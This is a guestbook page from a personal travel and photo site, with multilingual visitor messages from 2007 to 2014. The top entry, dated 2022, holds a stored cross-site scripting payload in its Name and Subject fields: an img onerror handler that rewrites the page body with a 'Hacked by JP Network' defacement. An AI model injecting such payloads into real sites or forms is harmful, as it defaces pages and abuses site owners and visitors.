Guestbook Messages


Name: <img src="x" onerror="document.body.innerHTML='Hacked by JP Network <br> ./WreP';">
Date: 22 October 2022 21:57:08
Subject: <img src="x" onerror="document.body.innerHTML='Hacked by JP Network <br> ./WreP';">
Name: NoClockThing
Date: 14 January 2014 10:18:49
Subject: happy new year
Obrigada e feliz ano novo :)
Name: Fernando R. Pintoi
Date: 9 January 2014 10:57:21
Subject: Happy New Year !
Hi, now i will try to write all this in english:

:) Happy new year ! :)
Name: Rockstarmagic
Date: 27 May 2008 23:27:27
Subject: Nice site!!!
Also mit Einwandfreiem Englisch kann ich nicht dienen und mit Gaellisch schon garnicht.

Die site gefaellt mir aber sehr gut!

Ich werde es weiterempfehlen!
Name: Waënelin
Date: 23 March 2008 22:33:06
Subject: bravo!
...pour ce site tout beau tout propre, et les superbes photos que j'y ai découvert! comme je me doute que tu as vraiment très peu de temps, je me suis permise de choisir quelques photos parmi mes préférées... et je mettrai à jour ta galerie sur L'Oeil et la Main dans quelques jours!
hug,
Waë
Name: NoClockThing
Date: 11 November 2007 20:35:41
Subject: Àiteachan neònach
Chunnaic sinn Grianaig ann an film agus bha sinn a' smaoineachadh carson nach tèid sinn ann. Chan eil am beatha a' tachairt anns na taighean-tasgaidh, a bheil? Chòrd e rinn glàn a bhith a' coiseachd ri taobh na h-aibhne.
Name: Steafan MacRisnidh
Date: 11 November 2007 20:04:44
Subject: An leabhar-latha agad
'S math a bhith gad leughadh...tha fadachd orm fhaicinn caite an deach sibh an deidh Grianaig! THa seo inntinneach air sailleabh 's nach robh sibh a' tadhal air na h-aiteannan abhaisteach, ach aiteannan sonraichte eile nach aithne dhomh fhein!
Name: NoClockThing
Date: 11 November 2007 11:25:54
Subject: Merci!
J' aurais plus d' images et plus d' histoire quand j' ai le temps...
Name: Cheyenne Angel
Date: 11 November 2007 10:58:38
Subject: great trip!
Superbe Voyage, et photos géniales :))))